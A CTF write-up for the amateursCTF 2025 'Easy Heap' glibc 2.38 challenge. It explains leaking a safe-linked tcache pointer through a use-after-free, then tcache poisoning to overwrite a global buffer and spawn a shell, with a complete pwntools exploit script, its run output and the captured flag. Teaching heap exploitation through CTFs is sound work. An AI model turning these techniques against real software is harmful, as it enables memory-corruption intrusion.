Writeup

amateursCTF 2025 Easy Heap — Writeup

Mohammed-Amine Bouaafia

November 19, 2025

3 min read

pwn heap uaf safe-linking glibc-2.38

amateursCTF Easy Heap — Writeup

Compact writeup for a Glibc 2.38 heap challenge (amateursCTF: Easy Heap) using a Use-After-Free read to bypass Safe Linking and poison tcache to overwrite a global buffer. Decompilation for analysis was obtained from dogbolt.org.

Summary

The binary is a typical menu-driven note manager (Alloc, Free, Edit, View). It is compiled without PIE, so global symbols reside at static addresses. A hidden option (67) triggers a check() function that spawns a shell if a global checkbuf contains a specific string. A Use-After-Free (UAF) lets us read the forward link of a freed tcache chunk to derive the heap address (bypassing Safe Linking), then perform tcache poisoning to return a pointer into the global checkbuf and overwrite it—no libc leak needed.

Vulnerability

Use-After-Free (UAF): The program frees pointers but doesn’t null out entries in its storage array, so Edit/View can still access freed chunks.

1
// Decompilation logic (dogbolt.org)
2
else if (local_b4 == 1) {
3
    free((void *)auStack_a8[local_b0]);
4
    // Vulnerability: auStack_a8[local_b0] is NOT set to NULL
5
}

Safe Linking (Glibc 2.38): Tcache singly-linked list pointers are mangled:

1
stored_fd = (chunk_addr >> 12) ^ next_ptr

A UAF read on a single-element tcache bin yields (chunk_addr >> 12) (since next_ptr == 0), letting us recover the heap base and craft a valid poisoned FD.

Exploitation

Heap leak (bypass Safe Linking)
1. Allocate chunk at index 0 and free it.
2. Use UAF “View” on index 0 to read the tcache FD.
3. Since it’s the last in its bin, next_ptr == 0, so leak = (heap_base >> 12).
4. Recover heap base via heap_base = leak << 12.
Tcache poisoning
1. Allocate and free another chunk at index 1.
2. Compute fake_fd = (chunk1_addr >> 12) ^ checkbuf_addr (static due to no PIE).
3. Use UAF “Edit” on index 1 to overwrite its FD with fake_fd.
Overwrite and win
1. Allocate to consume the real chunk (index 1).
2. Allocate again; the allocator returns a pointer to checkbuf.
3. Write the magic string “ALL HAIL OUR LORD AND SAVIOR TEEMO”.
4. Invoke menu option 67 to trigger system("sh").

Socket Solver

1
from pwn import *
2

3
exe = ELF('./chal')
4
context.binary = exe
5

6
TARGET_STRING = b"ALL HAIL OUR LORD AND SAVIOR TEEMO"
7

8
def start():
9
    if args.REMOTE:
10
        return remote('amt.rs', 37557)
11
    else:
12
        return process([exe.path])
13

14
io = start()
15

16
# --- Helper Functions based on Decompilation ---
17
def malloc(idx):
18
    io.sendlineafter(b'> ', b'0')      # Menu 0: Malloc
19
    io.sendlineafter(b'> ', str(idx).encode())
20

21
def free(idx):
22
    io.sendlineafter(b'> ', b'1')      # Menu 1: Free
23
    io.sendlineafter(b'> ', str(idx).encode())
24

25
def edit(idx, payload):
26
    io.sendlineafter(b'> ', b'2')      # Menu 2: Read (Edit)
27
    io.sendlineafter(b'> ', str(idx).encode())
28
    io.sendlineafter(b'data> ', payload)
29

30
def view(idx):
31
    io.sendlineafter(b'> ', b'3')      # Menu 3: Write (View)
32
    io.sendlineafter(b'> ', str(idx).encode())
33
    io.recvuntil(b'data> ')
34
    return io.recv(0x67) # Reads 0x67 bytes
35

36
def win():
37
    io.sendlineafter(b'> ', b'67')     # Menu 67: Check/Win
38

39
# --- Safe Linking Helper ---
40
def obfuscate(pos, ptr):
41
    return (pos >> 12) ^ ptr
42

43
# ==================================================
44
# EXPLOTATION START
45
# ==================================================
46

47
log.info("Step 1: Leaking Heap Base...")
48

49
# 1. Alloc and Free a chunk to populate Tcache
50
malloc(0)
51
free(0)
52

53
# 2. Read the Safe-Linked pointer
54
# Since it's the only chunk in bin, fd = (HeapBase >> 12) ^ 0
55
leak_data = view(0)
56
mangled_ptr = u64(leak_data[:8])
57
heap_base = mangled_ptr << 12
58

59
log.success(f"Heap Base: {hex(heap_base)}")
60

61
log.info("Step 2: Tcache Poisoning...")
62

63
# 1. Alloc a new chunk (Index 1)
64
malloc(1)
65

66
# 2. Free it to put it in Tcache
67
free(1)
68

69
# 3. Calculate the target address (checkbuf)
70
# We need to find where checkbuf is.
71
# Since No-PIE, we use the symbol from the binary.
72
checkbuf_addr = exe.symbols['checkbuf']
73
log.info(f"Target: checkbuf @ {hex(checkbuf_addr)}")
74

75
# 4. Calculate the obfuscated pointer
76
# We need the address of the chunk we are currently overwriting (Index 1)
77
# Index 0 was at offset 0x2a0 (usually)
78
# Index 1 should be at offset 0x330 (0x2a0 + 0x90 aligned)
79
# But we can just use the base + offset logic safely.
80
# The first malloc usually lands at heap_base + 0x2a0 (tcache struct overhead)
81
chunk_1_addr = heap_base + 0x330
82

83
fake_ptr = obfuscate(chunk_1_addr, checkbuf_addr)
84

85
# 5. Overwrite the fd pointer of the free chunk
86
edit(1, p64(fake_ptr))
87

88
log.info("Step 3: Allocating to Target...")
89

90
# 1. Malloc (consumes the chunk we just freed)
91
malloc(2)
92

93
# 2. Malloc again (consumes our FAKE chunk -> checkbuf)
94
malloc(3)
95

96
# 3. Write the secret passphrase into checkbuf
97
log.info(f"Writing passphrase: {TARGET_STRING}")
98
edit(3, TARGET_STRING + b'\x00')
99

100
log.info("Step 4: Triggering Win Condition...")
101
win()
102
io.send(b'cat flag\n')
103
io.interactive()

Result

After overwriting checkbuf, selecting option 67 spawns a shell and read flag instantly:

1
[+] Opening connection to amt.rs on port 37557: Done
2
[*] Step 1: Leaking Heap Base...
3
[+] Heap Base: 0x13e18000
4
[*] Step 2: Tcache Poisoning...
5
[*] Target: checkbuf @ 0x404040
6
[*] Step 3: Allocating to Target...
7
[*] Writing passphrase: b'ALL HAIL OUR LORD AND SAVIOR TEEMO'
8
[*] Step 4: Triggering Win Condition...
9
[*] Switching to interactive mode
10
check.
11
amateursCTF{what_is_a_flag?why_am_i_even_doing_this_anymore?crazy?i_was_crazy_once...}